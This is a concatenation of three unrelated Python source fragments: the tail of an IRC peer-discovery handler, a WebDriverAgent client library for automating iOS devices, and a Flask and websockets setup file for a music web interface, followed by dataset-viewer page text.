def on_quit(self, connection, event):
m = re.match("(E_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(E_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("E_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
_wdapy.py
|
# coding: utf-8
import atexit
import base64
import io
import json
import logging
import subprocess
import sys
import threading
import time
import typing
import requests
from cached_property import cached_property
from logzero import setup_logger
from PIL import Image
from ._alert import Alert
from ._base import BaseClient
from ._logger import logger
from ._proto import *
from ._types import *
from .exceptions import *
from .usbmux import requests_usbmux, usbmux
class HTTPResponse:
def __init__(self, resp: requests.Response, err: requests.RequestException):
self._resp = resp
self._err = err
def is_success(self) -> bool:
return self._err is None and self._resp.status_code == 200
def json(self) -> dict:
assert self._resp is not None
try:
return self._resp.json()
except json.JSONDecodeError:
return RequestError("JSON decode error", self._resp.text)
def get_error_message(self) -> str:
if self._resp:
return self._resp.text
return str(self._err)
def raise_if_failed(self):
if self._err:
raise RequestError("HTTP request error", self._err)
if self._resp.status_code != 200:
raise RequestError(self._resp.status_code, self._resp.text)
class CommonClient(BaseClient):
def __init__(self, wda_url: str):
super().__init__(wda_url)
self.__ui_size = None
self.__debug = False
@property
def debug(self) -> bool:
return self.__debug
@debug.setter
def debug(self, v: bool):
if v:
setup_logger(NAME)
else:
setup_logger(NAME, level=logging.INFO)
def app_start(self, bundle_id: str):
self.session_request(POST, "/wda/apps/launch", {
"bundleId": bundle_id
})
def app_terminate(self, bundle_id: str):
self.session_request(POST, "/wda/apps/terminate", {
"bundleId": bundle_id
})
def app_state(self, bundle_id: str) -> AppState:
value = self.session_request(POST, "/wda/apps/state", {
"bundleId": bundle_id
})["value"]
return AppState(value)
def app_current(self) -> AppInfo:
self.unlock()
st = self.status()
if st.session_id is None:
self.session()
data = self.request(GET, "/wda/activeAppInfo")
value = data['value']
return AppInfo.value_of(value)
def app_list(self) -> AppList:
value = self.session_request(GET, "/wda/apps/list")["value"][0]
return AppList.value_of(value)
def deactive(self, duration: float):
self.session_request(POST, "/wda/deactivateApp", {
"duration": duration
})
@cached_property
def alert(self) -> Alert:
return Alert(self)
def sourcetree(self) -> SourceTree:
data = self.request(GET, "/source")
return SourceTree.value_of(data)
def open_url(self, url: str):
self.session_request(POST, "/url", {
"url": url
})
def set_clipboard(self, content: str, content_type="plaintext"):
self.session_request(POST, "/wda/setPasteboard",{
"content": base64.b64encode(content.encode()).decode(),
"contentType": content_type
})
def appium_settings(self, kwargs: dict = None) -> dict:
if kwargs is None:
return self.session_request(GET, "/appium/settings")["value"]
payload = {"settings": kwargs}
return self.session_request(POST, "/appium/settings", payload)["value"]
def is_locked(self) -> bool:
return self.request(GET, "/wda/locked")["value"]
def unlock(self):
self.request(POST, "/wda/unlock")
def lock(self):
self.request(POST, "/wda/lock")
def homescreen(self):
self.request(POST, "/wda/homescreen")
def shutdown(self):
self.request(GET, "/wda/shutdown")
def get_orientation(self) -> Orientation:
value = self.session_request(GET, '/orientation')['value']
return Orientation(value)
def window_size(self) -> typing.Tuple[int, int]:
"""
Returns:
UISize
"""
# 这里做了一点速度优化,跟进图像大小获取屏幕尺寸
orientation = self.get_orientation()
if self.__ui_size is None:
# 这里认为screenshot返回的屏幕转向时正确的
pixel_width, pixel_height = self.screenshot().size
w, h = pixel_width//self.scale, pixel_height//self.scale
if self.get_orientation() == Orientation.PORTRAIT:
self.__ui_size = (w, h)
else:
self.__ui_size = (h, w)
if orientation == Orientation.LANDSCAPE:
return self.__ui_size[::-1]
else:
return self.__ui_size
def send_keys(self, value: str):
""" input with some text """
self.session_request(POST, "/wda/keys", {"value": list(value)})
def tap(self, x: int, y: int):
self.session_request(POST, "/wda/tap/0", {"x": x, "y": y})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = 0.5):
payload = {
"fromX": from_x,
"fromY": from_y,
"toX": to_x,
"toY": to_y,
"duration": duration}
self.session_request(POST, "/wda/dragfromtoforduration", payload)
def press(self, name: Keycode):
payload = {
"name": name
}
self.session_request(POST, "/wda/pressButton", payload)
def press_duration(self, name: Keycode, duration: float):
hid_usages = {
"home": 0x40,
"volumeup": 0xE9,
"volumedown": 0xEA,
"power": 0x30,
"snapshot": 0x65,
"power_plus_home": 0x65
}
name = name.lower()
if name not in hid_usages:
raise ValueError("Invalid name:", name)
hid_usages = hid_usages[name]
payload = {
"page": 0x0C,
"usage": hid_usages,
"duration": duration
}
return self.session_request(POST, "/wda/performIoHidEvent", payload)
@cached_property
def scale(self) -> int:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return value['scale']
def status_barsize(self) -> StatusBarSize:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return StatusBarSize.value_of(value['statusBarSize'])
def screenshot(self) -> Image.Image:
""" take screenshot """
value = self.request(GET, "/screenshot")["value"]
raw_value = base64.b64decode(value)
buf = io.BytesIO(raw_value)
im = Image.open(buf)
return im.convert("RGB")
def battery_info(self) -> BatteryInfo:
data = self.session_request(GET, "/wda/batteryInfo")["value"]
return BatteryInfo.value_of(data)
@property
def info(self) -> DeviceInfo:
return self.device_info()
def device_info(self) -> DeviceInfo:
data = self.session_request(GET, "/wda/device/info")["value"]
return DeviceInfo.value_of(data)
class XCUITestRecover(Recover):
def __init__(self, udid: str):
self._udid = udid
def recover(self) -> bool:
""" launch by tidevice
https://github.com/alibaba/tidevice
"""
logger.info("WDA is starting using tidevice ...")
args = [sys.executable, '-m', 'tidevice', '-u', self._udid, 'xctest']
p = subprocess.Popen(args,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
start_new_session=True,
close_fds=True, encoding="utf-8")
success = False
deadline = time.time() + 10
while time.time() < deadline:
if p.poll() is not None:
logger.warning("xctest exit, output: %s", p.stdout.read())
return False
line = p.stdout.readline().strip()
# logger.info("%s", line)
if "WebDriverAgent start successfully" in line:
logger.info("WDA started")
success = True
break
def drain_stdout():
while p.stdout.read() != "":
pass
if success:
threading.Thread(target=drain_stdout, daemon=True).start()
atexit.register(p.kill)
return success
class AppiumClient(CommonClient):
"""
client for https://github.com/appium/WebDriverAgent
"""
def __init__(self, wda_url: str = DEFAULT_WDA_URL):
super().__init__(wda_url)
class AppiumUSBClient(AppiumClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
class NanoClient(AppiumClient):
"""
Repo: https://github.com/nanoscopic/WebDriverAgent
This repo changes a lot recently and the new version code drop the HTTP API to NNG
So here use the old commit version
https://github.com/nanoscopic/WebDriverAgent/tree/d07372d73a4cc4dc0b0d7807271e6d7958e57302
"""
def tap(self, x: int, y: int):
""" fast tap """
self.request(POST, "/wda/tap", {
"x": x,
"y": y,
})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = .5):
""" fast swipe """
self.request(POST, "/wda/swipe", {
"x1": from_x,
"y1": from_y,
"x2": to_x,
"y2": to_y,
"delay": duration})
class NanoUSBClient(NanoClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
|
__init__.py
|
from flask import Flask
import asyncio
import websockets
import threading
from lib.functions import get_ip_address
import time
UPLOAD_FOLDER = 'Songs/'
webinterface = Flask(__name__, template_folder='templates')
webinterface.config['TEMPLATES_AUTO_RELOAD'] = True
webinterface.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
webinterface.config['MAX_CONTENT_LENGTH'] = 32 * 1000 * 1000
webinterface.socket_input = []
print("Socket listening on: " + str(get_ip_address())+":8765")
def start_server():
async def echo(websocket):
while True:
time.sleep(0.01)
for msg in webinterface.learning.socket_send[:]:
#print("input msg: " + str(msg))
await websocket.send(str(msg))
webinterface.learning.socket_send.remove(msg)
#message = websocket.recv()
async def main():
async with websockets.serve(echo, get_ip_address(), 8765):
await asyncio.Future()
asyncio.run(main())
processThread = threading.Thread(target=start_server, daemon=True)
processThread.start()
from webinterface import views
from webinterface import views_api
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.